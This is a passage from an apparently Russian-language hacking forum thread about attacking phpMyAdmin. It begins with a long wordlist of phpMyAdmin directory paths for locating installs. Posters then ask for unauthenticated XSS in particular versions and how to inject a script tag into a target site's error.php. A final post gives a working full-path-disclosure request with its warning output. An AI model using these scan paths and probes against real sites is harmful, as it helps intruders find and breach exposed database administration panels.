    /phpMyAdmin-4.0.10.6/
    /phpMyAdmin-4.0.10.7/
    /phpMyAdmin-4.0.10.8/
    /phpMyAdmin-4.0.10.9/
    /phpMyAdmin-4.0.10/
    /phpMyAdmin-4.0.2-rc1/
    /phpMyAdmin-4.0.2/
    /phpMyAdmin-4.0.3-rc1/
    /phpMyAdmin-4.0.3/
    /phpMyAdmin-4.0.4-rc1/
    /phpMyAdmin-4.0.4.1/
    /phpMyAdmin-4.0.4.2/
    /phpMyAdmin-4.0.4/
    /phpMyAdmin-4.0.5/
    /phpMyAdmin-4.0.6/
    /phpMyAdmin-4.0.7/
    /phpMyAdmin-4.0.8/
    /phpMyAdmin-4.0.9/
    /phpMyAdmin-4.1.0/
    /phpMyAdmin-4.1.1/
    /phpMyAdmin-4.1.10/
    /phpMyAdmin-4.1.11/
    /phpMyAdmin-4.1.12/
    /phpMyAdmin-4.1.13/
    /phpMyAdmin-4.1.14.1/
    /phpMyAdmin-4.1.14.2/
    /phpMyAdmin-4.1.14.3/
    /phpMyAdmin-4.1.14.4/
    /phpMyAdmin-4.1.14.5/
    /phpMyAdmin-4.1.14.6/
    /phpMyAdmin-4.1.14.7/
    /phpMyAdmin-4.1.14.8/
    /phpMyAdmin-4.1.14/
    /phpMyAdmin-4.1.2/
    /phpMyAdmin-4.1.3/
    /phpMyAdmin-4.1.4/
    /phpMyAdmin-4.1.5/
    /phpMyAdmin-4.1.6/
    /phpMyAdmin-4.1.7/
    /phpMyAdmin-4.1.8/
    /phpMyAdmin-4.1.9/
    /phpMyAdmin-4.2.0/
    /phpMyAdmin-4.2.1/
    /phpMyAdmin-4.2.10.1/
    /phpMyAdmin-4.2.10/
    /phpMyAdmin-4.2.11/
    /phpMyAdmin-4.2.12/
    /phpMyAdmin-4.2.13.1/
    /phpMyAdmin-4.2.13.2/
    /phpMyAdmin-4.2.13/
    /phpMyAdmin-4.2.2/
    /phpMyAdmin-4.2.3/
    /phpMyAdmin-4.2.4/
    /phpMyAdmin-4.2.5/
    /phpMyAdmin-4.2.6/
    /phpMyAdmin-4.2.7.1/
    /phpMyAdmin-4.2.7/
    /phpMyAdmin-4.2.8.1/
    /phpMyAdmin-4.2.8/
    /phpMyAdmin-4.2.9.1/
    /phpMyAdmin-4.2.9/
    /phpMyAdmin-4.3.0-alpha1/
    /phpMyAdmin-4.3.0-beta1/
    /phpMyAdmin-4.3.0-rc1/
    /phpMyAdmin-4.3.0-rc2/
    /phpMyAdmin-4.3.0/
    /phpMyAdmin-4.3.1/
    /phpMyAdmin-4.3.10/
    /phpMyAdmin-4.3.11.1/
    /phpMyAdmin-4.3.11/
    /phpMyAdmin-4.3.12/
    /phpMyAdmin-4.3.13/
    /phpMyAdmin-4.3.2/
    /phpMyAdmin-4.3.3/
    /phpMyAdmin-4.3.4/
    /phpMyAdmin-4.3.5/
    /phpMyAdmin-4.3.6/
    /phpMyAdmin-4.3.7/
    /phpMyAdmin-4.3.8/
    /phpMyAdmin-4.3.9/
    /phpMyAdmin-4.4.0-alpha1/
    /phpMyAdmin-4.4.0-rc1/
    /phpMyAdmin-4/
    /phpmyadmin-RELEASE_2_10_0/
    /phpmyadmin-RELEASE_2_10_0_1/
    /phpmyadmin-RELEASE_2_10_0_2/
    /phpmyadmin-RELEASE_2_10_0RC1/
    /phpmyadmin-RELEASE_2_10_1RC1/
    /phpmyadmin-RELEASE_2_10_2/
    /phpmyadmin-RELEASE_2_10_3/
    /phpmyadmin-RELEASE_2_10_3RC1/
    /phpmyadmin-RELEASE_2_11_0/
    /phpmyadmin-RELEASE_2_11_0RC2/
    /phpmyadmin-RELEASE_2_11_1/
    /phpmyadmin-RELEASE_2_11_1_1/
    /phpmyadmin-RELEASE_2_11_1_2/
    /phpmyadmin-RELEASE_2_11_10/
    /phpmyadmin-RELEASE_2_11_10_1/
    /phpmyadmin-RELEASE_2_11_11/
    /phpmyadmin-RELEASE_2_11_11_1/
    /phpmyadmin-RELEASE_2_11_11_2/
    /phpmyadmin-RELEASE_2_11_11_3/
    /phpmyadmin-RELEASE_2_11_11RC1/
    /phpmyadmin-RELEASE_2_11_1RC1/
    /phpmyadmin-RELEASE_2_11_2/
    /phpmyadmin-RELEASE_2_11_2_1/
    /phpmyadmin-RELEASE_2_11_2_2/
    /phpmyadmin-RELEASE_2_11_2RC1/
    /phpmyadmin-RELEASE_2_11_3/
    /phpmyadmin-RELEASE_2_11_3RC1/
    /phpmyadmin-RELEASE_2_11_4/
    /phpmyadmin-RELEASE_2_11_4RC1/
    /phpmyadmin-RELEASE_2_11_5/
    /phpmyadmin-RELEASE_2_11_5_1/
    /phpmyadmin-RELEASE_2_11_5_2/
    /phpmyadmin-RELEASE_2_11_5RC1/
    /phpmyadmin-RELEASE_2_11_6/
    /phpmyadmin-RELEASE_2_11_6RC1/
    /phpmyadmin-RELEASE_2_11_7/
    /phpmyadmin-RELEASE_2_11_7_1/
    /phpmyadmin-RELEASE_2_11_7RC1/
    /phpmyadmin-RELEASE_2_11_7RC2/
    /phpmyadmin-RELEASE_2_11_8/
    /phpmyadmin-RELEASE_2_11_8_1/
    /phpmyadmin-RELEASE_2_11_8RC1/
    /phpmyadmin-RELEASE_2_11_9/
    /phpmyadmin-RELEASE_2_11_9_1/
    /phpmyadmin-RELEASE_2_11_9_2/
    /phpmyadmin-RELEASE_2_11_9_3/
    /phpmyadmin-RELEASE_2_11_9_4/
    /phpmyadmin-RELEASE_2_11_9_5/
    /phpmyadmin-RELEASE_2_11_9_6/
    /phpmyadmin-RELEASE_2_2_0/
    /phpmyadmin-RELEASE_2_2_1/
    /phpmyadmin-RELEASE_2_2_2/
    /phpmyadmin-RELEASE_2_2_3/
    /phpmyadmin-RELEASE_2_2_4/
    /phpmyadmin-RELEASE_2_2_5/
    /phpmyadmin-RELEASE_2_2_6/
    /phpmyadmin-RELEASE_2_2_7PL1/
    /phpmyadmin-RELEASE_2_3_0/
    /phpmyadmin-RELEASE_2_3_1/
    /phpmyadmin-RELEASE_2_3_2/
    /phpmyadmin-RELEASE_2_3_3PL1/
    /phpmyadmin-RELEASE_2_4_0/
    /phpmyadmin-RELEASE_2_5_0/
    /phpmyadmin-RELEASE_2_5_1/
    /phpmyadmin-RELEASE_2_5_2/
    /phpmyadmin-RELEASE_2_5_4/
    /phpmyadmin-RELEASE_2_5_5PL1/
    /phpmyadmin-RELEASE_2_5_6/
    /phpmyadmin-RELEASE_2_6_1PL3/
    /phpmyadmin-RELEASE_2_7_0PL2/
    /phpmyadmin-RELEASE_2_8_0_4/
    /phpmyadmin-RELEASE_2_8_1/
    /phpmyadmin-RELEASE_2_8_2_4/
    /phpmyadmin-RELEASE_2_9_0/
    /phpmyadmin-RELEASE_2_9_0_1/
    /phpmyadmin-RELEASE_2_9_0_2/
    /phpmyadmin-RELEASE_2_9_1_1/
    /phpmyadmin-RELEASE_2_9_2/
    /phpmyadmin-RELEASE_2_9_2RC1/
    /phpmyadmin-RELEASE_3_0_0/
    /phpmyadmin-RELEASE_3_0_0ALPHA/
    /phpmyadmin-RELEASE_3_0_0RC2/
    /phpmyadmin-RELEASE_3_0_1/
    /phpmyadmin-RELEASE_3_0_1_1/
    /phpmyadmin-RELEASE_3_0_1RC1/
    /phpmyadmin-RELEASE_3_1_0/
    /phpmyadmin-RELEASE_3_1_0BETA1/
    /phpmyadmin-RELEASE_3_1_0RC1/
    /phpmyadmin-RELEASE_3_1_1/
    /phpmyadmin-RELEASE_3_1_2/
    /phpmyadmin-RELEASE_3_1_2RC1/
    /phpmyadmin-RELEASE_3_1_3/
    /phpmyadmin-RELEASE_3_1_3_1/
    /phpmyadmin-RELEASE_3_1_3_2/
    /phpmyadmin-RELEASE_3_1_3RC1/
    /phpmyadmin-RELEASE_3_1_4/
    /phpmyadmin-RELEASE_3_1_4RC1/
    /phpmyadmin-RELEASE_3_1_4RC2/
    /phpmyadmin-RELEASE_3_1_5/
    /phpmyadmin-RELEASE_3_1_5RC1/
    /phpmyadmin-RELEASE_3_2_0/
    /phpmyadmin-RELEASE_3_2_0_1/
    /phpmyadmin-RELEASE_3_2_0BETA1/
    /phpmyadmin-RELEASE_3_2_0RC1/
    /phpmyadmin-RELEASE_3_2_2/
    /phpmyadmin-RELEASE_3_2_2_1/
    /phpmyadmin-RELEASE_3_2_2RC1/
    /phpmyadmin-RELEASE_3_2_3/
    /phpmyadmin-RELEASE_3_2_3RC1/
    /phpmyadmin-RELEASE_3_2_4/
    /phpmyadmin-RELEASE_3_2_4RC1/
    /phpmyadmin-RELEASE_3_2_5/
    /phpmyadmin-RELEASE_3_2_5RC1/
    /phpmyadmin-RELEASE_3_2_5RC2/
    /phpmyadmin-RELEASE_3_3_0/
    /phpmyadmin-RELEASE_3_3_0ALPHA1/
    /phpmyadmin-RELEASE_3_3_0BETA1/
    /phpmyadmin-RELEASE_3_3_0RC1/
    /phpmyadmin-RELEASE_3_3_0RC2/
    /phpmyadmin-RELEASE_3_3_0RC3/
    /phpmyadmin-RELEASE_3_3_1/
    /phpmyadmin-RELEASE_3_3_10/
    /phpmyadmin-RELEASE_3_3_10_1/
    /phpmyadmin-RELEASE_3_3_10_2/
    /phpmyadmin-RELEASE_3_3_10_3/
    /phpmyadmin-RELEASE_3_3_10_4/
    /phpmyadmin-RELEASE_3_3_10_5/
    /phpmyadmin-RELEASE_3_3_10RC1/
    /phpmyadmin-RELEASE_3_3_1RC1/
    /phpmyadmin-RELEASE_3_3_2/
    /phpmyadmin-RELEASE_3_3_2RC1/
    /phpmyadmin-RELEASE_3_3_3/
    /phpmyadmin-RELEASE_3_3_3RC1/
    /phpmyadmin-RELEASE_3_3_4/
    /phpmyadmin-RELEASE_3_3_4RC1/
    /phpmyadmin-RELEASE_3_3_5/
    /phpmyadmin-RELEASE_3_3_5_1/
    /phpmyadmin-RELEASE_3_3_5RC1/
    /phpmyadmin-RELEASE_3_3_6/
    /phpmyadmin-RELEASE_3_3_6RC1/
    /phpmyadmin-RELEASE_3_3_7/
    /phpmyadmin-RELEASE_3_3_7RC1/
    /phpmyadmin-RELEASE_3_3_8/
    /phpmyadmin-RELEASE_3_3_8_1/
    /phpmyadmin-RELEASE_3_3_8RC1/
    /phpmyadmin-RELEASE_3_3_9/
    /phpmyadmin-RELEASE_3_3_9_1/
    /phpmyadmin-RELEASE_3_3_9_2/
    /phpmyadmin-RELEASE_3_3_9RC1/
    /phpmyadmin-RELEASE_3_4_0/
    /phpmyadmin-RELEASE_3_4_0ALPHA1/
    /phpmyadmin-RELEASE_3_4_0ALPHA2/
    /phpmyadmin-RELEASE_3_4_0BETA1/
    /phpmyadmin-RELEASE_3_4_0BETA2/
    /phpmyadmin-RELEASE_3_4_0BETA3/
    /phpmyadmin-RELEASE_3_4_0BETA4/
    /phpmyadmin-RELEASE_3_4_0RC1/
    /phpmyadmin-RELEASE_3_4_0RC2/
    /phpmyadmin-RELEASE_3_4_1/
    /phpmyadmin-RELEASE_3_4_10/
    /phpmyadmin-RELEASE_3_4_10_1/
    /phpmyadmin-RELEASE_3_4_10_2/
    /phpmyadmin-RELEASE_3_4_10RC1/
    /phpmyadmin-RELEASE_3_4_11/
    /phpmyadmin-RELEASE_3_4_11_1/
    /phpmyadmin-RELEASE_3_4_11RC1/
    /phpmyadmin-RELEASE_3_4_1RC1/
    /phpmyadmin-RELEASE_3_4_2/
    /phpmyadmin-RELEASE_3_4_2RC1/
    /phpmyadmin-RELEASE_3_4_3/
    /phpmyadmin-RELEASE_3_4_3_1/
    /phpmyadmin-RELEASE_3_4_3_2/
    /phpmyadmin-RELEASE_3_4_3RC1/
    /phpmyadmin-RELEASE_3_4_4/
    /phpmyadmin-RELEASE_3_4_4RC1/
    /phpmyadmin-RELEASE_3_4_5/
    /phpmyadmin-RELEASE_3_4_5RC1/
    /phpmyadmin-RELEASE_3_4_6/
    /phpmyadmin-RELEASE_3_4_6RC1/
    /phpmyadmin-RELEASE_3_4_7/
    /phpmyadmin-RELEASE_3_4_7_1/
    /phpmyadmin-RELEASE_3_4_7RC1/
    /phpmyadmin-RELEASE_3_4_8/
    /phpmyadmin-RELEASE_3_4_8RC1/
    /phpmyadmin-RELEASE_3_4_9/
    /phpmyadmin-RELEASE_3_4_9RC1/
    /phpmyadmin-RELEASE_3_5_0/
    /phpmyadmin-RELEASE_3_5_0ALPHA1/
    /phpmyadmin-RELEASE_3_5_0BETA1/
    /phpmyadmin-RELEASE_3_5_0RC1/
    /phpmyadmin-RELEASE_3_5_0RC2/
    /phpmyadmin-RELEASE_3_5_1/
    /phpmyadmin-RELEASE_3_5_1RC1/
    /phpmyadmin-RELEASE_3_5_2/
    /phpmyadmin-RELEASE_3_5_2_1/
    /phpmyadmin-RELEASE_3_5_2_2/
    /phpmyadmin-RELEASE_3_5_2RC1/
    /phpmyadmin-RELEASE_3_5_3/
    /phpmyadmin-RELEASE_3_5_3RC1/
    /phpmyadmin-RELEASE_3_5_4/
    /phpmyadmin-RELEASE_3_5_4RC1/
    /phpmyadmin-RELEASE_3_5_5/
    /phpmyadmin-RELEASE_3_5_5RC1/
    /phpmyadmin-RELEASE_3_5_6/
    /phpmyadmin-RELEASE_3_5_6RC1/
    /phpmyadmin-RELEASE_3_5_7/
    /phpmyadmin-RELEASE_3_5_7RC1/
    /phpmyadmin-RELEASE_3_5_8/
    /phpmyadmin-RELEASE_3_5_8_1/
    /phpmyadmin-RELEASE_3_5_8RC1/
    /phpmyadmin-RELEASE_4_0_0/
    /phpmyadmin-RELEASE_4_0_0ALPHA1/
    /phpmyadmin-RELEASE_4_0_0ALPHA2/
    /phpmyadmin-RELEASE_4_0_0BETA1/
    /phpmyadmin-RELEASE_4_0_0BETA2/
    /phpmyadmin-RELEASE_4_0_0RC2/
    /phpmyadmin-RELEASE_4_0_0RC3/
    /phpmyadmin-RELEASE_4_0_0RC4/
    /phpmyadmin-RELEASE_4_0_1/
    /phpmyadmin-RELEASE_4_0_10_1/
    /phpmyadmin-RELEASE_4_0_10_2/
    /phpmyadmin-RELEASE_4_0_10_3/
    /phpmyadmin-RELEASE_4_0_10_4/
    /phpmyadmin-RELEASE_4_0_10_5/
    /phpmyadmin-RELEASE_4_0_10_6/
    /phpmyadmin-RELEASE_4_0_10_7/
    /phpmyadmin-RELEASE_4_0_10_8/
    /phpmyadmin-RELEASE_4_0_10_9/
    /phpmyadmin-RELEASE_4_0_1RC1/
    /phpmyadmin-RELEASE_4_0_2/
    /phpmyadmin-RELEASE_4_0_2RC1/
    /phpmyadmin-RELEASE_4_0_3/
    /phpmyadmin-RELEASE_4_0_3RC1/
    /phpmyadmin-RELEASE_4_0_4RC1/
    /phpmyadmin-RELEASE_4_1_14_2/
    /phpmyadmin-RELEASE_4_1_14_3/
    /phpmyadmin-RELEASE_4_1_14_4/
    /phpmyadmin-RELEASE_4_1_14_5/
    /phpmyadmin-RELEASE_4_1_14_6/
    /phpmyadmin-RELEASE_4_1_14_7/
    /phpmyadmin-RELEASE_4_1_14_8/
    /phpmyadmin-RELEASE_4_2_10/
    /phpmyadmin-RELEASE_4_2_10_1/
    /phpmyadmin-RELEASE_4_2_11/
    /phpmyadmin-RELEASE_4_2_12/
    /phpmyadmin-RELEASE_4_2_13/
    /phpmyadmin-RELEASE_4_2_13_1/
    /phpmyadmin-RELEASE_4_2_13_2/
    /phpmyadmin-RELEASE_4_2_6/
    /phpmyadmin-RELEASE_4_2_7/
    /phpmyadmin-RELEASE_4_2_7_1/
    /phpmyadmin-RELEASE_4_2_8/
    /phpmyadmin-RELEASE_4_2_8_1/
    /phpmyadmin-RELEASE_4_2_9/
    /phpmyadmin-RELEASE_4_2_9_1/
    /phpmyadmin-RELEASE_4_3_0/
    /phpmyadmin-RELEASE_4_3_0ALPHA1/
    /phpmyadmin-RELEASE_4_3_0BETA1/
    /phpmyadmin-RELEASE_4_3_0RC1/
    /phpmyadmin-RELEASE_4_3_0RC2/
    /phpmyadmin-RELEASE_4_3_1/
    /phpmyadmin-RELEASE_4_3_10/
    /phpmyadmin-RELEASE_4_3_11/
    /phpmyadmin-RELEASE_4_3_11_1/
    /phpmyadmin-RELEASE_4_3_12/
    /phpmyadmin-RELEASE_4_3_13/
    /phpmyadmin-RELEASE_4_3_2/
    /phpmyadmin-RELEASE_4_3_3/
    /phpmyadmin-RELEASE_4_3_4/
    /phpmyadmin-RELEASE_4_3_5/
    /phpmyadmin-RELEASE_4_3_6/
    /phpmyadmin-RELEASE_4_3_7/
    /phpmyadmin-RELEASE_4_3_8/
    /phpmyadmin-RELEASE_4_3_9/
    /phpmyadmin-RELEASE_4_4_0ALPHA1/
    /phpmyadmin/
    /phpmyadmin_/
    /phpMyAdmin_/
    /phpmyadmin_1/
    /phpMyAdmin_1/
    /phpMyAdmin1/
    /phpmyadmin123/
    /phpmyadmin2/
    /phpMyAds/
    /pma/
    /PMA/
    /pma1/
    /pma2005/
    /PMA2005/
    /sqlmanager/
    /sqlweb/
    /web/phpMyAdmin/
    /webadmin/
    /webdb/
    /websql/
    
    
    
    
     
    #33 zuzzz, 16 Jun 2015
    Last edited: 2 Jul 2015
    crlf, grimnir, SuNDowN and 3 others like this.
  14. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    50
    Likes Received:
    2
    Reputations:
    0
    phpmyadmin 3.4.8 есть ли что нибудь под это?
     
  15. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    261
    Likes Received:
    97
    Reputations:
    25
    Cross-Site-Scripting
     
  16. proger_doe

    proger_doe New Member

    Joined:
    5 Feb 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  17. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,108
    Likes Received:
    752
    Reputations:
    200
    _________________________
  18. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    82
    Likes Received:
    2
    Reputations:
    5
    Подскажите, какие есть XSS не требующие авторизации для версий от 2.11?
     
  19. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    82
    Likes Received:
    2
    Reputations:
    5
    Хорошо, тогда подскажите как можно вписать <script>alert()</script> в странице "http://***.org/phpMyAdmin/error.php?type=ErrorHeader&error=TextForError", если в параметрах можно подставлять только тэги типa:
    '' => '<em>',
    '
    ' => '</em>',
    '[em]' => '<em>',
    '[/em]' => '</em>',
    '' => '<strong>',
    '
    ' => '</strong>',
    '[strong]' => '<strong>',
    '[/strong]' => '</strong>',
    '[tt]' => '<code>',
    '[/tt]' => '</code>',
    '[*code]' => '<code>',
    '[*/code]' => '</code>',
    '[kbd]' => '<kbd>',
    '[/kbd]' => '</kbd>',
    '[br]' => '<br />',
    '[/a]' => '</a>',
    '[sup]' => '<sup>',
    '[/sup]' => '</sup>',
     
  20. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    282
    Likes Received:
    65
    Reputations:
    4
    full path disclosure
    проверял на 4.0.8. в какой версии пофиксили не могу сказать
    http://site.com/myadmin/js/get_scripts.js.php?scripts[][]=123

    Code:
    Warning: explode() expects parameter 2 to be string, array given in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 20
    
    Warning: Invalid argument supplied for foreach() in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 21
    
     
    foozzione likes this.
Loading...